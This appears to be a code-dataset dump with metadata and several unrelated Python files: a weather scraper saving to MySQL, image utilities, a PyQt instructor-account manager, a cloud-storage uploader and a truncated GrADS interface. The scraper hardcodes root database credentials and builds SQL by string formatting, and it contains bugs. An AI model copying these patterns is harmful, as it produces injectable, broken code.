168, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 171, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 182, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 186, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 190, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 194, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 198, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 198, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 202, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 205, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 209, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 214, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 218, "usage_type": "call"}, {"api_name": "django.db.models.Max", "line_number": 227, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 233, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 233, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 242, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 250, "usage_type": "call"}, {"api_name": "django.db.models.Max", "line_number": 252, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 260, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 260, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 292, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 323, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 325, "usage_type": "call"}, {"api_name": "razorpay.Client", "line_number": 332, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 335, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 337, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 342, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 345, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 366, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 366, "usage_type": "name"}, {"api_name": "django.http.HttpResponse", "line_number": 373, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 375, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 377, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 384, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 389, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 392, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 395, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 397, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 402, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 408, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 411, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 414, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 419, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 424, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 426, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 426, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 427, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 427, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 431, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 431, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 440, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 442, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 449, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 459, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 462, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 471, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 486, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 492, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 497, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 500, "usage_type": "call"}, {"api_name": "django.core.files.storage.FileSystemStorage", "line_number": 508, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 518, "usage_type": "call"}, {"api_name": "django.db.models.Count", "line_number": 521, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 523, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 526, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 529, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 534, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 540, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 543, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 546, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 551, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 556, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 558, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 558, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 559, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 559, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 564, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 564, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 573, "usage_type": "call"}, {"api_name": "datetime.datetime.today", "line_number": 575, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 575, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 586, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 591, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 593, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 596, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 610, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 627, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 636, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 641, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 646, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 651, "usage_type": "call"}]} +{"seq_id": "27144411912", "text": "import requests\nfrom bs4 import BeautifulSoup\nimport pymysql\n\nconn = pymysql.connect(user='root', password='123456', host='localhost', database='new', port=3306, charset='utf8')\ncursor = conn.cursor()\n\n\ndef get_page(url):\n try:\n headers = {\n 'user-agent': 'Mozilla/5.0'\n }\n response = requests.get(url=url, headers=headers)\n response.raise_for_status()\n response.encoding = response.apparent_encoding\n return response.text # 以字符串的形式来返回了网页的源码\n except:\n return 'error'\n\n\ndef parse_page(html, city_name):\n soup = BeautifulSoup(html, 'lxml')\n \"\"\"\n 时间实况 -> time\n 温度 -> tem\n 相对湿度 -> zs h\n 风向级数 -> zs w\n 空气质量 -> zs pool\n \"\"\"\n\n data = soup.find(class_=\"curve_livezs\") # curve_livezs\n time = data.find(class_='time')\n\n\n wea = soup.find_all(class_=\"wea\")[0].text.strip()\n # print(\"天气概况:\", wea)\n tem = soup.find_all(class_=\"tem\")[0].text.strip()\n # print(\"当前温度:\", tem)\n win = soup.find_all(class_=\"win\")[0].span['title'].strip()\n # print(\"风向:\", win)\n leve1 = soup.find_all(class_=\"win\")[0].i.text.strip()\n # print(\"风力:\", leve1)\n # print(\"当前时间是:\", time.asctime())\n time1 = time.asctime()\n\n # time = soup.find('div', class_='sk mySkyNull').find('p', class_='time').find('span').get_text()\n\n # tem1 = soup.find('div', 'sk mySkyNull').find('div', 'tem').find('span').get_text()\n # tem2 = soup.find('div', 'sk mySkyNull').find('div', 'tem').find('em').get_text()\n # tem = tem1 + tem2\n #\n # zs_h1 = soup.find('div', 'sk mySkyNull').find('div', 'zs h').find('span').get_text()\n # zs_h2 = soup.find('div', 'sk mySkyNull').find('div', 'zs h').find('em').get_text()\n # zs_h = zs_h1 + zs_h2\n #\n # zs_w1 = soup.find('div', 'sk mySkyNull').find('div', 'zs w').find('span').get_text()\n # zs_w2 = soup.find('div', 'sk mySkyNull').find('p', 'zs w').find('em').get_text()\n # zs_w = zs_w1 + zs_w2\n #\n # zs_pool = soup.find('div', 'sk mySkyNull').find('div', 'zs pool').find('span').find('a').get_text()\n\n # sql = \"INSERT INTO test1(城市,时间实况, 温度,相对湿度,风向级数,空气质量) VALUES ('%s','%s', '%s', '%s', '%s', '%s')\" % (\n # city_name, time1, tem, zs_h, zs_w, zs_pool)\n\n sql = \"INSERT INTO test2(城市,日期,时间实况, 当前温度,天气概况,风向,风力) VALUES ('%s','%s', '%s', '%s', '%s', '%s', '%s')\" % (\n city_name, date, time1, tem, wea, win, leve1)\n\n try:\n cursor.execute(sql)\n conn.commit()\n except Exception as e:\n print(e)\n conn.rollback()\n\n\ndef main():\n files = open('city_list_pre7.txt', 'r', encoding='utf-8')\n city_name_id = files.readlines()\n\n try:\n for line in city_name_id:\n city_name = line.split('-')[0].replace(\"\\n\", \"\")\n city_id = line.split('-')[1].replace(\"\\n\", \"\")\n\n url = 'http://www.weather.com.cn/weather1d/' + city_id + '.shtml'\n\n html = get_page(url)\n\n # print(html) # 输出用以检查全部内容\n\n parse_page(html, city_name)\n files.close()\n except:\n print(\"error\")\n\n\nif __name__ == '__main__':\n main()\n print('success')", "repo_name": "ZhouYao0627/Python_Spider", "sub_path": "Weather/05_weather.py", "file_name": "05_weather.py", "file_ext": "py", "file_size_in_byte": 3296, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pymysql.connect", "line_number": 5, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "33907384040", "text": "import json\na = {\n \"firstName\": \"Jane\",\n \"lastName\": \"Doe\",\n \"hobbies\": [\"running\", \"sky diving\", \"singing\"],\n \"age\": 35,\n \"children\": [\n {\n \"firstName\": \"Alice\",\n \"age\": 6\n },\n {\n \"firstName\": \"Bob\",\n \"age\": 8\n }\n ]\n}\n\njson_file = \"my_file.json\"\n\nwith open(json_file, 'w') as file_obj:\n json.dump(a, file_obj)\n\n", "repo_name": "benie-leroy/DI-learning", "sub_path": "Di_execises/week_5/day_4/index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.dump", "line_number": 22, "usage_type": "call"}]} +{"seq_id": "16744355608", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Sep 12 11:29:21 2020\n\n@author: Kinjal Dand\n\nCommonly used python functions\n\n\"\"\"\n\nfrom PIL import Image\nimport numpy as np\nimport os\nimport cv2\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nDATA_FOLDER = os.path.join(BASE_DIR,\"Data\")\n\ndef get_file_extension(img_path):\n filename, file_extension = os.path.splitext(img_path)\n return filename, file_extension\n\ndef get_filename_from_path(dest_path):\n return os.path.basename(dest_path)\n\ndef get_file_size(file_name):\n file_path = get_image_path(file_name)\n size_bytes = os.path.getsize(file_path)\n #print(file_path,size_bytes)\n return size_bytes\n\ndef get_image_path(image_name):\n if image_name.startswith(DATA_FOLDER) == False:\n return os.path.join(DATA_FOLDER,image_name)\n else:\n return image_name\n \ndef handle_path(image_name,append_text=\"\"):\n dest_path = get_image_path(image_name)\n append_text = str(append_text)\n if append_text.strip()!=\"\":\n filename, file_extension = get_file_extension(dest_path)\n \n if append_text.startswith('_')==False:\n append_text = \"_\" +append_text\n dest_path = filename + append_text + file_extension\n return dest_path\n \ndef save_img(img,image_name,append_text=\"\"):\n dest_path = handle_path(image_name,append_text)\n if isinstance(img,np.ndarray):\n cv2.imwrite(dest_path,img)\n else:\n #img = img.astype(np.uint8)\n #img = Image.fromarray(img)\n img.save(dest_path)\n return get_filename_from_path(dest_path)\n \n\n \ndef get_image_as_array(image_name):\n file_path = get_image_path(image_name)\n img = Image.open(file_path)\n pix = np.array(img)\n #print(type(img)) #\n #print(type(pix)) #\n return pix\n \ndef get_image_as_cv2(image_name):\n file_path = get_image_path(image_name)\n img = cv2.imread(file_path)\n #print(type(img)) #\n return img\n \n \n", "repo_name": "kinjaldand/ImageProcessing", "sub_path": "MyUtils.py", "file_name": "MyUtils.py", "file_ext": "py", "file_size_in_byte": 2030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.dirname", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.path.getsize", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 51, "usage_type": "attribute"}, {"api_name": "cv2.imwrite", "line_number": 52, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 63, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 63, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "44249963197", "text": "import sys, os\n\nfrom PyQt5.QtCore import QObject, pyqtSignal as Signal, pyqtSlot as Slot\n\nfrom classes import database, imgto\n\nclass instructor(QObject):\n def __init__(self):\n QObject.__init__(self)\n self.fromDB = database.database()\n self.get_img = imgto.database()\n self.sqlString = None\n self.sqlData = None\n self.sqlList = None\n\n displaySignal = Signal(str, str)\n displaySignal2 = Signal(int, int)\n @Slot()\n def display(self):\n self.sqlString = \"SELECT name, id_school, id FROM accounts WHERE type = 'instructor'\"\n self.sqlList = self.fromDB.selectall(self.sqlString)\n count = 0\n for x in self.sqlList:\n self.displaySignal.emit(x[0], x[1])\n self.displaySignal2.emit(count, x[2])\n\n count += 1\n \n @Slot(str, str, result=bool)\n def addInstructor(self, school_id, name):\n try:\n school_id = str(int(school_id))\n self.sqlString = \"INSERT INTO accounts (id_school, name, type) VALUES (%s, %s, 'instructor')\"\n self.sqlData = (school_id, name.title())\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n self.sqlString = \"INSERT INTO instructorinfo (id) VALUES ((SELECT id FROM accounts WHERE id_school = %s))\"\n self.sqlData = (school_id,)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n self.sqlString = \"INSERT INTO accountimg (id, img) VALUES ((SELECT id FROM accounts WHERE id_school = %s), %s)\"\n with open(os.path.join(os.getcwd(), \"img/favicon.png\"), \"rb\") as img:\n binary_data = img.read()\n self.sqlData = (school_id, binary_data)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n self.sqlString = \"SELECT id FROM accounts WHERE id_school = %s\"\n self.sqlData = (school_id,)\n self.sqlList = self.fromDB.selectone(self.sqlString, self.sqlData)[0]\n self.get_img.getimg(self.sqlList)\n\n return True \n\n except:\n return False\n\n @Slot(str, result=bool)\n def removeInstructor(self, id):\n try:\n self.sqlString = \"DELETE FROM accounts WHERE id = %s\"\n self.sqlData = (id,)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n \n self.sqlString = \"DELETE FROM accountimg WHERE id = %s\"\n self.sqlData = (id,)\n self.fromDB.setValues(self.sqlString, self.sqlData)\n\n return True \n \n except:\n return False\n\n @Slot(str, str, str, result=bool)\n def editInstructor(self, id, school_id, name):\n try:\n school_id = str(int(school_id))\n self.sqlString = \"UPDATE accounts a JOIN instructorinfo i ON a.id = i.id SET id_school = %s, name = %s WHERE a.id = %s\"\n self.sqlData = (school_id, name, id)\n self.fromDB.setValues (self.sqlString, self.sqlData)\n\n return True \n \n except:\n return False\n", "repo_name": "shanpadayhag/queuing_system", "sub_path": "classes/adminFunctions/instructor.py", "file_name": "instructor.py", "file_ext": "py", "file_size_in_byte": 3051, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtCore.QObject", "line_number": 7, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QObject.__init__", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QObject", "line_number": 9, "usage_type": "name"}, {"api_name": "classes.database.database", "line_number": 10, "usage_type": "call"}, {"api_name": "classes.database", "line_number": 10, "usage_type": "name"}, {"api_name": "classes.imgto.database", "line_number": 11, "usage_type": "call"}, {"api_name": "classes.imgto", "line_number": 11, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 29, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 73, "usage_type": "call"}]} +{"seq_id": "12568270394", "text": "# rabbitmq.py\n\nfrom google.cloud import storage\n\nimport sys\nimport numpy as np\nimport cv2\nimport os\n\n\ndef singleBlobUpload(_bucket_name, _source_file_name, _destination_blob):\n \"\"\"\n Uploads a file to the bucket:\n _bucket_name: The ID of your GCS bucket\n _source_file_name: The path to the file to upload\n _destination_blon: The path to the file in GCS bucket\n \"\"\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(_bucket_name)\n destination_blob_name = _destination_blob\n blob = bucket.blob(destination_blob_name)\n\n # Optional: set a generation-match precondition to avoid potential race conditions\n # and data corruptions. The request to upload is aborted if the object's\n # generation number does not match your precondition. For a destination\n # object that does not yet exist, set the if_generation_match precondition to 0.\n # If the destination object already exists in your bucket, set instead a\n # generation-match precondition using its generation number.\n generation_match_precondition = 0\n\n try:\n blob.upload_from_filename(\n _source_file_name, if_generation_match=generation_match_precondition)\n except Exception as e:\n print(f\"Error when upload {_source_file_name} to bucket: {e}\")\n return False\n\n print(f\"File {_source_file_name} uploaded to bucket: {destination_blob_name}\")\n return True\n", "repo_name": "acsii-63/cloud-based", "sub_path": "module/rabbitmq.py", "file_name": "rabbitmq.py", "file_ext": "py", "file_size_in_byte": 1414, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "google.cloud.storage.Client", "line_number": 19, "usage_type": "call"}, {"api_name": "google.cloud.storage", "line_number": 19, "usage_type": "name"}]} +{"seq_id": "24604124038", "text": "\"\"\"\nPython 3 interface to GrADS, inspired by the work of Arlindo da Silva on PyGrADS.\nA GrADS object is used to pass commands to a GrADS instance and parse the output.\n\nBasic Usage:\n from py3grads import Grads\n ga = Grads()\n # Example command\n output, rc = ga('query config')\n\nVersion: 1.1\n\nTested with: GrADS v2.1.a3, v2.1.0\n\nAuthor: Levi Cowan \n\"\"\"\n\n__all__ = ['GrADSError', 'PygradsError', 'Grads', 'GaEnv']\n\nfrom collections import OrderedDict\nfrom datetime import datetime\nfrom io import BytesIO\nfrom itertools import product\nimport numpy as np\nimport re\nfrom subprocess import Popen, PIPE, STDOUT\n\n###############################################\n# Custom Exceptions #\n###############################################\n\nclass GrADSError(Exception):\n pass\n\nclass PygradsError(Exception):\n pass\n\n###############################################\n# GrADS Interface #\n###############################################\nclass Grads:\n def __init__(self, launch='grads -bul', verbose=True):\n \"\"\"\n The primary interface to GrADS. User commands can be passed in as input\n to be executed after the object is initialized.\n\n Args:\n launch: The system command to launch GrADS. The flags '-b', '-u', and\n either '-l' or '-p' are required in order to collect GrADS output\n without shell interactivity. Other flags may be specified.\n Default flags are '-bul'.\n\n verbose: If True, will print all output.\n \"\"\"\n self.verbose = verbose\n\n # GrADS launch arguments. Ensure required flags are included.\n args = launch.split()\n executable = args[0]\n opts = args[1:] if len(args) > 1 else []\n givenflags = [a[1:] for a in args if a.startswith('-')]\n # We may have to add new flags if required\n newflags = ''\n # Batch mode '-b' and unbuffered mode '-u' are required\n for flag in 'bu':\n if not any([flag in fset for fset in givenflags]):\n newflags += flag\n # Landscape or portrait mode must be specified at launch\n if not any(['l' in fset or 'p' in fset for fset in givenflags]):\n # Default to landscape\n newflags += 'l'\n args = (executable, '-'+newflags, *opts) if newflags else (executable, *opts)\n\n # Launch the GrADS process\n self.p = Popen(args, bufsize=0, stdin=PIPE, stdout=PIPE, stderr=STDOUT,\n universal_newlines=False)\n\n # Define regex matching ANSI formatting\n self.ansi = re.compile(r'\\x1b[^m]*m')\n\n # Dismiss initial launch output\n splashlines, rc = self._parse_output(verbose=self.verbose)\n\n # Detect GrADS build if possible, but don't crash here\n try:\n versionstr = splashlines[0].split('Version')[-1]\n self.build = 'opengrads' if 'oga' in versionstr else 'grads'\n except:\n self.build = 'grads'\n\n self.MISSING = -9.99e8\n\n def __call__(self, gacmd):\n \"\"\"\n Allow commands to be passed to the GrADS object\n \"\"\"\n outlines, rc = self.cmd(gacmd)\n if rc > 0:\n print('\\n'.join(outlines))\n raise GrADSError('GrADS returned rc='+str(rc)\n +' for the following command:\\n'+gacmd)\n return outlines, rc\n\n def __del__(self):\n \"\"\"\n Call the GrADS quit command, close pipes, and terminate the\n subprocess. An error here is not fatal.\n \"\"\"\n try:\n self.cmd('quit')\n self.p.stdin.close()\n self.p.stdout.close()\n self.p.terminate()\n except:\n pass\n\n def _parse_output(self, marker='IPC', verbose=True, encoding='utf-8'):\n \"\"\"\n Collect and return GrADS output from stdout.\n\n Args:\n marker: The tag name bounding relevant output.\n verbose: If True, each line of output is printed to stdout.\n encoding: Expected character encoding of the GrADS output\n Returns:\n lines: List containing all lines of output\n rc: The return code (int)\n \"\"\"\n markstart = '<'+marker+'>'\n markend = ''\n lines = []\n out = ''\n rc = -1\n # Output is contained within stream marker tags\n # First get to the next markstart tag\n while markstart not in out:\n out = self.filter_output(self.p.stdout.readline().decode(encoding))\n if len(out) == 0:\n raise GrADSError(\"GrADS terminated.\")\n # Collect output between marker tags\n out = self.filter_output(self.p.stdout.readline().decode(encoding))\n while markend not in out:\n if len(out) > 0:\n # Get return code\n if '' in out:\n rc = int(out.split()[1])\n # Collect all other lines\n else:\n # Get rid of newline at the end\n lines.append(out[:-1])\n if verbose:\n print(lines[-1])\n else:\n raise GrADSError(\"GrADS terminated.\")\n out = self.filter_output(self.p.stdout.readline().decode(encoding))\n\n return lines, rc\n\n def move_pointer(self, marker, encoding='utf-8', verbose=False):\n \"\"\"\n Move the GrADS stream pointer to the given marker.\n The marker only has to match a portion of a line of output.\n\n Additional Args:\n encoding: Expected character encoding of the GrADS output\n \"\"\"\n out = ''\n while marker not in out:\n out = self.filter_output(self.p.stdout.readline().decode(encoding))\n if verbose:\n print(out)\n if len(out) == 0:\n raise GrADSError(\"GrADS terminated.\")\n return\n\n def filter_output(self, output):\n \"\"\"\n Perform filtering on GrADS output, such as removing ANSI formatting.\n \"\"\"\n # Filter out ANSI formatting in OpenGrADS\n output = self.ansi.sub('', output)\n return output\n\n def cmd(self, gacmd, verbose=True, block=True, encoding='utf-8'):\n \"\"\"\n Run a GrADS command.\n\n Args:\n gacmd: The command string to be executed.\n verbose: If False, suppress output to stdout\n block: If True, block and collect all output.\n encoding: Expected character encoding of the GrADS output\n Returns:\n outlines: List of output lines from GrADS.\n rc: GrADS return code (int)\n \"\"\"\n # Always need a carriage return at the end of the input\n if gacmd[-1] != '\\n':\n gacmd += '\\n'\n # Input to GrADS is always UTF-8 bytes\n self.p.stdin.write(gacmd.encode('utf-8'))\n self.p.stdin.flush()\n # Collect output\n if block:\n # Let global verbose=False override if local verbose is True\n if verbose:\n outlines, rc = self._parse_output(encoding=encoding, verbose=self.verbose)\n else:\n outlines, rc = self._parse_output(encoding=encoding, verbose=False)\n output = '\\n'.join(outlines)\n if 'Syntax Error' in output:\n raise GrADSError('Syntax Error while evaluating '+gacmd)\n else:\n outlines = []\n rc = 0\n\n return outlines, rc\n\n def flush(self, encoding='utf-8'):\n \"\"\"\n Flush the GrADS output pipe. This may be necessary when\n the output stream ends but the stream pointer is decoupled\n from its marker. At this point the output pipe hangs.\n If it is known in advance that this will happen, calling\n flush() will reset the pointer by running an ubiquitous command.\n \"\"\"\n self.cmd('q config', verbose=False, encoding=encoding)\n\n def env(self, query='all'):\n \"\"\"\n Query and return the GrADS dimension and display environment.\n This function is designed to make a new query every time it is\n called in order to avoid problems when assuming the last known\n state has not changed. A snapshot of the environment at a specific\n time can be saved by assigning a variable to a call of this function.\n \"\"\"\n return GaEnv(self, query)\n\n def exp(self, expr):\n \"\"\"\n Export a GrADS field to a Numpy array. Since only up to 2-dimensional\n data can be written out by GrADS, requesting arrays of rank > 2 will be\n less efficient than defining the same array in GrADS.\n\n Args:\n expr: GrADS expression representing the field to be exported.\n \"\"\"\n # Get the current environment\n env = self.env()\n dimnames = ('x','y','z','t','e') # ordered by GrADS read efficiency\n # Detect which dimensions are varying\n dims = [dim for dim in dimnames if not getattr(env, dim+'fixed')]\n # We can only display/output data from GrADS up to 2 dimensions at a\n # time, so for rank > 2, we must fix the extra dimensions. For best\n # efficiency, always select the two fastest dimensions to vary.\n varying, fixed = dims[:2], dims[2:]\n # Varying dimensions must be ordered identically to GrADS fwrite output\n fwrite_order = ['z','y','x','t','e']\n varying.sort(key=lambda dim: fwrite_order.index(dim))\n output_dims = varying + fixed\n # For common cases, it is desirable to enforce a certain dimension\n # order in the output array for the first two axes\n output_orders2D = OrderedDict([\n ('xy', ['y','x']), ('xz', ['z','x']), ('yz', ['z','y']),\n ('xt', ['t','x']), ('yt', ['y','t']), ('zt', ['z','t'])\n ])\n # Check for 2D base dimensions in order of preference\n for first2, order in output_orders2D.items():\n if set(first2).issubset(dims):\n ordered_dims = order + [d for d in dims if d not in order]\n break\n else:\n ordered_dims = dims\n # Read data into Numpy array\n if len(dims) <= 2:\n arr = self._read_array(expr, varying)\n else:\n dimvals = {}\n for dim in dims:\n mn, mx = getattr(env, dim+'i')\n dimvals[dim] = range(mn, mx+1)\n # Sets of fixed coordinates for which to request arrays while the\n # first two (most efficient) dimensions vary\n coordinates = product(*[dimvals[dim] for dim in fixed])\n arr = None # Need to wait to define until we know shape of arr1D\n for coords in coordinates:\n # Set fixed dimemsions and get array indices\n idx = []\n for dim, c in zip(fixed, coords):\n self.cmd('set {dim} {c}'.format(dim=dim, c=c))\n idx.append(dimvals[dim].index(c))\n # Get 2D array\n arr2D = self._read_array(expr, varying)\n # Define full data array\n if arr is None:\n arr = np.zeros(arr2D.shape + tuple(len(dimvals[d]) for d in fixed))\n # Assign data along first two dimensions\n arr[(slice(None), slice(None)) + tuple(idx)] = arr2D\n # Re-order axes if necessary\n axes = [(i, output_dims.index(d)) for i, d in zip(range(len(dims)), ordered_dims)]\n swapped = []\n for a1, a2 in axes:\n pair = sorted([a1, a2])\n if a1 != a2 and pair not in swapped:\n arr = np.swapaxes(arr, a1, a2)\n swapped.append(pair)\n # Restore original GrADS dimension environment\n for dim in dims:\n mn, mx = getattr(env, dim)\n self.cmd('set {dim} {mn} {mx}'.format(dim=dim, mn=mn, mx=mx))\n return arr\n\n def _read_array(self, expr, dims):\n \"\"\"\n Read a GrADS field into a Numpy array. The rank of the array must\n be 2 or less.\n\n Args:\n expr: GrADS expression representing the field to be read.\n dims: List of GrADS varying dimension names defining the\n space occupied by expr.\n \"\"\"\n encoding = 'latin-1'\n env = self.env()\n # Enable GrADS binary output to stream\n self.cmd('set gxout fwrite', verbose=False)\n self.cmd('set fwrite -st -', verbose=False)\n # Don't block output here so we can intercept the data stream\n self.cmd('display '+expr, verbose=False, block=False)\n # Move stream pointer to ''\n self.move_pointer('', encoding=encoding, verbose=False)\n # Read binary data from stream\n handle = BytesIO()\n chsize = 4096 # Read data in 512 byte chunks\n rcpattern = re.compile(b'\\\\n\\\\s?-?\\d+\\s?\\<\\/RC\\>') # pattern of RC tag\n while True:\n chunk = self.p.stdout.read(chsize)\n # We know we're at the end when we encounter a return code wrapped\n # in RC tags, immediately following a newline. (\\n {number} )\n # Must be very precise in detecting this because '' by itself\n # can appear in a binary data stream.\n endmatch = rcpattern.search(chunk)\n if endmatch:\n # Cut out whatever data precedes the tag\n handle.write(chunk[:endmatch.span()[0]])\n # The ending character of the last chunk is arbitrary,\n # we only know that is in it.\n # Thus, need to flush GrADS pipes to avoid hanging\n # and reset the pointer to the next marker.\n 